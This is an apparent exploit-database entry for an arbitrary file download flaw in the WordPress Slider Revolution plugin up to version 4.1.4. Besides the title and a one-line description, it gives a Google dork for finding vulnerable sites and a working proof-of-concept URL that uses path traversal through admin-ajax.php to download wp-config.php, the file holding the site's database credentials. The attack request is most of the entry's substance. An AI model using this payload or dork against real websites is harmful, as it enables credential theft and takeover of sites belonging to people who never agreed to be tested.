
WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download

Wednesday, 10 July 2019

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Description
WordPress Slider Revolution Responsive <= 4.1.4 suffers from an arbitrary file download vulnerability.
######################
# PoC
http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Pecandu CoKlay
